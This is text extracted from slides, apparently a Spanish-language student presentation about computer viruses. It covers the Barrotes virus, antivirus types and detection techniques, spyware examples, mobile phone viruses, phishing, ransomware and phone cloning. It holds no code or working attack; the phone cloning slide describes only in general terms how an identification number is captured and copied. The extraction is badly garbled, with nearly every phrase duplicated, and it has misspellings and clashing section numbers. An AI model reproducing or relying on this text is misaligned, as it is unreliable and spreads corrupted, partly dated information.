Page 90: LOS VIRUS

-CONTINUACION:-CONTINUACION:

El resultado era que a partir de entonces, cada vez que el El resultado era que a partir de entonces, cada vez que el usuario utilizara el ordenador, se podian ver unas barras usuario utilizara el ordenador, se podian ver unas barras azules verticales, como los barrotes de una cárcel (de ahí el azules verticales, como los barrotes de una cárcel (de ahí el nombre del virus). En pantalla aparecía además la firma de nombre del virus). En pantalla aparecía además la firma de su creador: “Virus BARROTES por OSoft”. su creador: “Virus BARROTES por OSoft”.

Page 91: LOS VIRUS

Las siguientes versiones del virus eran más malignas. De esta forma existía Barrotes.1463, que intenta borrar múltiples archivos el día 22 de cada mes, pero que debido a un error de programación, se activaba los días 34 (o sea, nunca). El Barrotes.1303 es la versión más dañina, ya que destruye el sector de arranque del disco duro los días 23 de Septiembre.

Page 92: LOS VIRUS

3.6-EJEMPLOS DE PROGRAMAS 3.6-EJEMPLOS DE PROGRAMAS HACKERHACKER

En lo que concierne a programas hacker hay una gran En lo que concierne a programas hacker hay una gran variedad de estos programas maliciosos variedad de estos programas maliciosos

keylogger keylogger SniffersSniffers CrakeadoresCrakeadores

Page 93: LOS VIRUS

4-SEGURIDAD: 4-SEGURIDAD:

4.1-METODOS DE PROTECCION4.1-METODOS DE PROTECCION 4.2-ANTIVIRUS4.2-ANTIVIRUS 4.3-CONSEJOS PARA USUARIOS 4.3-CONSEJOS PARA USUARIOS 4.4-CONSEJOS PARA EMPRESAS4.4-CONSEJOS PARA EMPRESAS

Page 94: LOS VIRUS

4.1-METODOS DE 4.1-METODOS DE PROTECCION:PROTECCION:

ACTIVOS:ACTIVOS: Son los denominados programas antivirus cuya Son los denominados programas antivirus cuya misión es buscar y destruir al virus causante de la infección misión es buscar y destruir al virus causante de la infección

PASIVOS: PASIVOS:

Copias de seguridad:Copias de seguridad: Mantener una política de copias de Mantener una política de copias de seguridad garantiza la recuperación de los datos y una seguridad garantiza la recuperación de los datos y una solución cuando nada de lo anterior ha funcionadosolución cuando nada de lo anterior ha funcionado. .

Estudiar:Estudiar: Aprender como es el software de nuestra Aprender como es el software de nuestra computadora, buscando y buscando información, en sitios computadora, buscando y buscando información, en sitios en los que se pueda confiar, sobre software dañino, para así en los que se pueda confiar, sobre software dañino, para así evitarlo. evitarlo.

Desconfiar:Desconfiar: consiste en utilizar contraseñas consiste en utilizar contraseñas

Page 95: LOS VIRUS

4.2-LOS ANTIVIRUS:¿QUE 4.2-LOS ANTIVIRUS:¿QUE SON?SON?

Los antivirus son programas que tratan de detectar, si un Los antivirus son programas que tratan de detectar, si un objeto informático ejecutable es infectado por un programa objeto informático ejecutable es infectado por un programa Virus. Virus.

La mayoría de los antivirus pueden restaurar el archivo La mayoría de los antivirus pueden restaurar el archivo infectado a su estado original, aunque no siempre es infectado a su estado original, aunque no siempre es posible, dado que los virus pueden haber hecho cambios no posible, dado que los virus pueden haber hecho cambios no reversibles. reversibles.

Los antivirus pueden también borrar los archivos infectados Los antivirus pueden también borrar los archivos infectados o hacer el virus inofensivo. o hacer el virus inofensivo.

Page 96: LOS VIRUS

4.3-TIPOS DE ANTIVIRUS:4.3-TIPOS DE ANTIVIRUS:

RESIDENTES: Son los mas comunes y los mas complejos RESIDENTES: Son los mas comunes y los mas complejos estas continuamente vigilando y analizando estas continuamente vigilando y analizando

ANALIZADORES BAJO DEMANDA: Utilizan el mismo motor de ANALIZADORES BAJO DEMANDA: Utilizan el mismo motor de búsqueda que los residentes se encargan de analizar partes búsqueda que los residentes se encargan de analizar partes del sistema solamente cuando el usuario lo solicitadel sistema solamente cuando el usuario lo solicita

Page 97: LOS VIRUS

4.4-CLASIFICACION DE LOS 4.4-CLASIFICACION DE LOS

ANTIVIRUS:ANTIVIRUS:

Clasificación A, por acción:Clasificación A, por acción: Solo detecciónSolo detección Detección y desinfecciónDetección y desinfección Detección y aborto de la acciónDetección y aborto de la acción Detección y eliminación del archivo/objetoDetección y eliminación del archivo/objeto Clasificación B, por método de detección:Clasificación B, por método de detección: Comparación directaComparación directa Comparación por signaturaComparación por signatura Comparación de signatura de archivo (detección por Comparación de signatura de archivo (detección por

comparación con atributos guardados).comparación con atributos guardados). Por métodos heurísticosPor métodos heurísticos

Page 98: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Clasificación C, por instante de activación:Clasificación C, por instante de activación: Invocado por el/la usuario/aInvocado por el/la usuario/a Invocado por actividad del sistema (abrir, ejecutar, copiar, Invocado por actividad del sistema (abrir, ejecutar, copiar,

guardar archivo)guardar archivo) Clasificación D, por Objeto infectado:Clasificación D, por Objeto infectado: Sector de ArranqueSector de Arranque Archivo EjecutableArchivo Ejecutable Macro Virus (Excel, Word)Macro Virus (Excel, Word) JavaJava

Page 99: LOS VIRUS

4.5-TECNICAS DE DETECCION 4.5-TECNICAS DE DETECCION DE LOS VIRUS:DE LOS VIRUS:

A medida que evolucionan las técnicas empleadas por los A medida que evolucionan las técnicas empleadas por los virus y éstas son investigadas, los programas antivirus virus y éstas son investigadas, los programas antivirus incorporan medidas de búsqueda y detección más avanzadas incorporan medidas de búsqueda y detección más avanzadas como las siguientes:como las siguientes:

Búsqueda de Cadenas:Búsqueda de Cadenas: Cada uno de los virus contiene en su interior determinadas Cada uno de los virus contiene en su interior determinadas

cadenas de caracteres que le identifican (firmas del virus). Los cadenas de caracteres que le identifican (firmas del virus). Los programas antivirus incorporan un fichero denominado programas antivirus incorporan un fichero denominado "fichero de firmas de virus" en el que guardan todas estas "fichero de firmas de virus" en el que guardan todas estas cadenas, para hacer posible la detección de cualquiera de cadenas, para hacer posible la detección de cualquiera de ellos. ellos.

Por lo tanto, para detectar un virus, se analizan los ficheros Por lo tanto, para detectar un virus, se analizan los ficheros comprobando si alguno de ellos contiene alguna de las comprobando si alguno de ellos contiene alguna de las cadenas comentadas.cadenas comentadas.

Si el fichero analizado no contiene ninguna de ellas, se Si el fichero analizado no contiene ninguna de ellas, se considera limpio. Si el programa antivirus detecta alguna de considera limpio. Si el programa antivirus detecta alguna de esas cadenas en el fichero, indica la posibilidad de que éste se esas cadenas en el fichero, indica la posibilidad de que éste se encuentre infectado. En tal caso, se producirá la desinfección encuentre infectado. En tal caso, se producirá la desinfección

Page 100: LOS VIRUS

-BUSQUEDA DE -BUSQUEDA DE EXCEPCIONES:EXCEPCIONES:

Una alternativa en lo que se refiere a la detección de virus, Una alternativa en lo que se refiere a la detección de virus, es la búsqueda de excepciones. Cuando un virus utiliza una es la búsqueda de excepciones. Cuando un virus utiliza una cadena para realizar una infección, pero en posteriores cadena para realizar una infección, pero en posteriores infecciones emplea otras distintas, es difícil detectarlo. En infecciones emplea otras distintas, es difícil detectarlo. En ese caso lo que el programa antivirus consigue es realizar ese caso lo que el programa antivirus consigue es realizar directamente la búsqueda de un virus en concreto.directamente la búsqueda de un virus en concreto.

Page 101: LOS VIRUS

-ANALISIS HEURISTICO:-ANALISIS HEURISTICO:

Cuando no existe información para detectar un posible Cuando no existe información para detectar un posible nuevo virus (que aun no se conoce), se utiliza esta técnica. nuevo virus (que aun no se conoce), se utiliza esta técnica. Con ella se analizan los archivos, obteniendo determinada Con ella se analizan los archivos, obteniendo determinada información (tamaño, fecha y hora de creación, posibilidad información (tamaño, fecha y hora de creación, posibilidad de colocarse en memoria,...etc.). de colocarse en memoria,...etc.).

Esta información es contrastada por el programa antivirus Esta información es contrastada por el programa antivirus con las informaciones que se hayan podido recogen en con las informaciones que se hayan podido recogen en ocasiones anteriores a cerca de cada uno de los ficheros ocasiones anteriores a cerca de cada uno de los ficheros objeto del análisis. objeto del análisis.

El antivirus será quien decida si puede tratarse de una El antivirus será quien decida si puede tratarse de una infección vírica, o no.infección vírica, o no.

Page 102: LOS VIRUS

-PROTECCION -PROTECCION PERMANENTE:PERMANENTE:

La protección permanente vigila constantemente todas La protección permanente vigila constantemente todas aquellas operaciones realizadas en el ordenador que sean aquellas operaciones realizadas en el ordenador que sean susceptibles de permitir una infección por un virus. Si se susceptibles de permitir una infección por un virus. Si se tiene activada una buena protección, el riesgo de contagio tiene activada una buena protección, el riesgo de contagio es mínimo, y se facilita enormemente el trabajo con el es mínimo, y se facilita enormemente el trabajo con el ordenador, ya que no hay que estar pendiente de analizar ordenador, ya que no hay que estar pendiente de analizar todo lo que se recibe: la protección permanente se encarga todo lo que se recibe: la protección permanente se encarga de ello automáticamente.de ello automáticamente.

Page 103: LOS VIRUS

-VACUNACION:-VACUNACION:

El programa antivirus almacena información sobre cada uno El programa antivirus almacena información sobre cada uno de los archivos. Si se detecta algún cambio entre la de los archivos. Si se detecta algún cambio entre la información guardada y la información actual, el antivirus información guardada y la información actual, el antivirus avisa de lo ocurrido. Existen dos tipos de vacunaciones:avisa de lo ocurrido. Existen dos tipos de vacunaciones:

Interna:Interna: la información se guarda dentro del propio archivo la información se guarda dentro del propio archivo analizado. Al ejecutarse, él mismo comprueba si ha sufrido analizado. Al ejecutarse, él mismo comprueba si ha sufrido algún cambio. algún cambio.

Externa:Externa: la información se guarda en un archivo especial y la información se guarda en un archivo especial y desde él se contrastan las posibles modificaciones.desde él se contrastan las posibles modificaciones.

Page 104: LOS VIRUS

5-OTRAS AMENAZAS:5-OTRAS AMENAZAS:

1-SPYWARE1-SPYWARE 2-VIRUS EN 2-VIRUS EN

TELEFONOS TELEFONOS MOVILESMOVILES

3-FISHING3-FISHING 4-RAMSONWARE4-RAMSONWARE 5-CLONACION DE 5-CLONACION DE

TELEFONOS TELEFONOS M0VILESM0VILES

Page 105: LOS VIRUS

4-DEFINICION DE SPYWARE:4-DEFINICION DE SPYWARE: El spyware es usado para la sustraccion de informacion El spyware es usado para la sustraccion de informacion

personal de un ordenador tales como contraseñas , datos personal de un ordenador tales como contraseñas , datos bancarios etc esta sustraccion de lleva de manera secreta es bancarios etc esta sustraccion de lleva de manera secreta es decir que el usuario no es consciente de que se esta decir que el usuario no es consciente de que se esta sustrallendo informacion sin su consentimiento la unica sustrallendo informacion sin su consentimiento la unica manera de evitarlo es tener un antivirus que sea capaz de manera de evitarlo es tener un antivirus que sea capaz de detectar estas amenazas invisibles. Estan divididos en dos detectar estas amenazas invisibles. Estan divididos en dos

ADWARE:ADWARE: SPYWARE:SPYWARE: Según su forma de activarse, podemos diferenciar: Según su forma de activarse, podemos diferenciar: BHOBHO (Browser Helper Object): (Browser Helper Object):

Son Son pluginsplugins de los navegadores. Suelen ser cargados al de los navegadores. Suelen ser cargados al pulsar un enlace de una página maliciosa visitada, y se pulsar un enlace de una página maliciosa visitada, y se ejecutarán cada vez que se abra el navegador. Pueden ejecutarán cada vez que se abra el navegador. Pueden aparecer visibles como barras de herramientas del aparecer visibles como barras de herramientas del navegador, o permanecer ocultos mientras realizan una serie navegador, o permanecer ocultos mientras realizan una serie de operaciones sin conocimiento del usuario. de operaciones sin conocimiento del usuario.

Page 106: LOS VIRUS

-EJEMPLOS DE SPYWARE:-EJEMPLOS DE SPYWARE:

WebHancerWebHancerEste programa recaba información de los hábitos del usuario Este programa recaba información de los hábitos del usuario en Internet como URLs visitadas, tamaño de las Webs, en Internet como URLs visitadas, tamaño de las Webs, tiempo conectado a Internet. Hay que proceder con cuidado tiempo conectado a Internet. Hay que proceder con cuidado en su desinstalación.en su desinstalación.

Mattel BroadcastMattel BroadcastBusquen un archivo llamado Busquen un archivo llamado DSSAgent.exeDSSAgent.exe y bórrenlo. Es el y bórrenlo. Es el responsable de la publicidad no deseada de la firma de responsable de la publicidad no deseada de la firma de juguetes infantiles Mattel.juguetes infantiles Mattel.

HotBarHotBarHotBar recoge información acerca de las Webs que visitamos HotBar recoge información acerca de las Webs que visitamos y la información que solicitamos en buscadores. HotBar y la información que solicitamos en buscadores. HotBar recoge la IP y las URL que visitamos y las envía a su servidor recoge la IP y las URL que visitamos y las envía a su servidor para elaborar perfiles estadísticos de los hábitos de los para elaborar perfiles estadísticos de los hábitos de los internautas. Incluso ZDNet le concedió un premio 5 estrellas internautas. Incluso ZDNet le concedió un premio 5 estrellas (5-Stars) a este spyware, lo cual no deja de ser (5-Stars) a este spyware, lo cual no deja de ser sorprendente.sorprendente.

Page 107: LOS VIRUS

4-COMO PREVENIR EL 4-COMO PREVENIR EL SPYWARE:SPYWARE:

No hacer clic en vínculos que aparezcan en ventanas de No hacer clic en vínculos que aparezcan en ventanas de mensajes emergentes mensajes emergentes

Escoger la opción “No” cuando aparezcan preguntas no Escoger la opción “No” cuando aparezcan preguntas no deseadas. Se debe ser cuidadoso cuando algunos cuadros deseadas. Se debe ser cuidadoso cuando algunos cuadros de diálogo tienen la leyenda de si se desea ejecutar un de diálogo tienen la leyenda de si se desea ejecutar un programa o realizar otro tipo de tarea programa o realizar otro tipo de tarea

Ser cuidadoso al descargar software gratuito Ser cuidadoso al descargar software gratuito No hacer clic en vínculos contenidos en correos electrónicos No hacer clic en vínculos contenidos en correos electrónicos

que ofrezcan software anti-spyware. que ofrezcan software anti-spyware. Ejecutar un navegador de Web que permita el bloqueo de Ejecutar un navegador de Web que permita el bloqueo de

ventanas de mensajes emergentes y cookies. ventanas de mensajes emergentes y cookies. Utilizar un navegador alterno a Internet Explorer. La mayoría Utilizar un navegador alterno a Internet Explorer. La mayoría

del spyware toma ventajas de las vulnerabilidades de del spyware toma ventajas de las vulnerabilidades de seguridad en el navegador de Web Internet Explorer, seguridad en el navegador de Web Internet Explorer,

Page 108: LOS VIRUS

5.2-VIRUS EN TELEFONOS 5.2-VIRUS EN TELEFONOS MOVILES:MOVILES:

Esta es la nueva amenaza a la que nos enfrentamos los Esta es la nueva amenaza a la que nos enfrentamos los millones de usuarios de telefonos moviles es una nueva millones de usuarios de telefonos moviles es una nueva forma de ataque que ya no es exclusiva de los ordenadores forma de ataque que ya no es exclusiva de los ordenadores y que muy pronto podria tener la misma magnitud que y que muy pronto podria tener la misma magnitud que tienen actualmente los virus de ordenador. Esta amenaza tienen actualmente los virus de ordenador. Esta amenaza actua oculta una vez que se a instalado en el telefono movil actua oculta una vez que se a instalado en el telefono movil y generalmente en terminales que tienen y generalmente en terminales que tienen MMS o bluetoothMMS o bluetooth

Page 109: LOS VIRUS

-PROPAGACION Y -PROPAGACION Y ACTUACION:ACTUACION:

Hasta ahora, se sabe que este tipo de virus pueden Hasta ahora, se sabe que este tipo de virus pueden propagarse de dos maneras distintas: propagarse de dos maneras distintas:

Por Por MMSMMS:: Se recibe un mensaje con una aplicación adjunta Se recibe un mensaje con una aplicación adjunta invitándole a instalarla. invitándole a instalarla.

Por Por Bluetooth:Bluetooth: Aparece un mensaje en pantalla pidiendo su Aparece un mensaje en pantalla pidiendo su confirmación para instalar una nueva aplicación.confirmación para instalar una nueva aplicación.

En ambos casos la aplicación puede tratarse de un virus, y En ambos casos la aplicación puede tratarse de un virus, y

sólo si se acepta la instalación, su teléfono será infectado. sólo si se acepta la instalación, su teléfono será infectado.

Page 110: LOS VIRUS

5.3-EL PHISHING:5.3-EL PHISHING:

El "phishing" es una modalidad de estafa diseñada con la El "phishing" es una modalidad de estafa diseñada con la finalidad de robarle la identidad. El delito consiste en finalidad de robarle la identidad. El delito consiste en obtener información tal como números de tarjetas de obtener información tal como números de tarjetas de crédito, contraseñas, información de cuentas u otros datos crédito, contraseñas, información de cuentas u otros datos personales por medio de engaños. Este tipo de fraude se personales por medio de engaños. Este tipo de fraude se recibe habitualmente a través de mensajes de correo recibe habitualmente a través de mensajes de correo electrónico, sitios web, llamadas telefónicas u otras vías de electrónico, sitios web, llamadas telefónicas u otras vías de comunicación de compañías legítimas.comunicación de compañías legítimas.

Page 111: LOS VIRUS

-COMO ACTUA EL PHISHING:-COMO ACTUA EL PHISHING:

En esta modalidad de fraude, el usuario malintencionado En esta modalidad de fraude, el usuario malintencionado envía millones de mensajes falsos que parecen provenir de envía millones de mensajes falsos que parecen provenir de sitios Web reconocidos o de su confianza, como su banco o sitios Web reconocidos o de su confianza, como su banco o la empresa de su tarjeta de crédito.la empresa de su tarjeta de crédito.

Dado que los mensajes y los sitios Web que envían estos Dado que los mensajes y los sitios Web que envían estos usuarios parecen oficiales, logran engañar a muchas usuarios parecen oficiales, logran engañar a muchas personas haciéndoles creer que son legítimos. La gente personas haciéndoles creer que son legítimos. La gente confiada normalmente responde a estas solicitudes de confiada normalmente responde a estas solicitudes de correo electrónico con sus números de tarjeta de crédito, correo electrónico con sus números de tarjeta de crédito, contraseñas, información de cuentas u otros datos contraseñas, información de cuentas u otros datos personales.personales.

Page 112: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Para que estos mensajes parezcan aun más reales, el Para que estos mensajes parezcan aun más reales, el estafador suele incluir un vínculo falso que parece dirigir al estafador suele incluir un vínculo falso que parece dirigir al sitio Web legítimo, pero en realidad lleva a un sitio falso o sitio Web legítimo, pero en realidad lleva a un sitio falso o incluso a una ventana emergente que tiene exactamente el incluso a una ventana emergente que tiene exactamente el mismo aspecto que el sitio Web oficial. Estas copias se mismo aspecto que el sitio Web oficial. Estas copias se denominan "sitios Web piratas".denominan "sitios Web piratas".

Una vez que el usuario está en uno de estos sitios Web, Una vez que el usuario está en uno de estos sitios Web, introduce información personal sin saber que se transmitirá introduce información personal sin saber que se transmitirá directamente al delincuente, que la utilizará para realizar directamente al delincuente, que la utilizará para realizar compras, solicitar una nueva tarjeta de crédito o robar su compras, solicitar una nueva tarjeta de crédito o robar su identidad.identidad.

Page 113: LOS VIRUS

5.45.4-RAMSONWARE:-RAMSONWARE:

Esta tecnica ha vuelto a sugir en internet consiste en un tipo Esta tecnica ha vuelto a sugir en internet consiste en un tipo de viru que pro asi decirlo nos secuestra los archivos de viru que pro asi decirlo nos secuestra los archivos encriptandolos y adjunta un mensaje en el que se nos pide encriptandolos y adjunta un mensaje en el que se nos pide una cantidad de dinero si se quieren recuperar esos datos una cantidad de dinero si se quieren recuperar esos datos ademas se adjunta una cuenta bancaria una vez pagada la ademas se adjunta una cuenta bancaria una vez pagada la cantidad reclamada se nos facilita una clave para cantidad reclamada se nos facilita una clave para desencriptar los archivo esta es una manera de estafa desencriptar los archivo esta es una manera de estafa

Page 114: LOS VIRUS

4-CLONACION DE TELEFONOS 4-CLONACION DE TELEFONOS MOVILES:MOVILES:

Esta tecnica es de reciente apararicion consiste en hacer una copia Esta tecnica es de reciente apararicion consiste en hacer una copia ilegal del telefono todo empieza cuando una persona realiza una ilegal del telefono todo empieza cuando una persona realiza una llamada envia al aire un espectroradioelectrico que contiene el S.I.N llamada envia al aire un espectroradioelectrico que contiene el S.I.N que es una numeracion unica (Sistem Identication Number) dicha que es una numeracion unica (Sistem Identication Number) dicha numeracion es usada por la compañía para hacer la tarificacion del numeracion es usada por la compañía para hacer la tarificacion del telefono para escanear dicha señal se usan equipos que escanean el telefono para escanear dicha señal se usan equipos que escanean el aire en busca de esta señal y asi pueden identificar el S .I .N lo toman lo aire en busca de esta señal y asi pueden identificar el S .I .N lo toman lo instalan y se lo configuran a otro telefono movil de tal forma que instalan y se lo configuran a otro telefono movil de tal forma que entonces asi existiran dos telefonos con la misma identificacion de tal entonces asi existiran dos telefonos con la misma identificacion de tal forma que cuando llamen al dueño del telefono tambien sonara el forma que cuando llamen al dueño del telefono tambien sonara el telefono clonado pero la estafa se realiza cuando el usuario del telefono telefono clonado pero la estafa se realiza cuando el usuario del telefono clonado realiza una llamada ya que la tarificaion de esas llamadas se las clonado realiza una llamada ya que la tarificaion de esas llamadas se las pasan al otro usuario sin que este de entere aunque las compañias pasan al otro usuario sin que este de entere aunque las compañias estan incorporando sistemas que detectan estos fraudes informaticos ya estan incorporando sistemas que detectan estos fraudes informaticos ya que lo que se hace en caso de que el sistema que controla la que lo que se hace en caso de que el sistema que controla la identificacion de los telefonos detecte dos telefonos con la misma identificacion de los telefonos detecte dos telefonos con la misma identificacion dicho sistema procede a la anulacion de la ultima identificacion dicho sistema procede a la anulacion de la ultima identificacion entrante identificacion entrante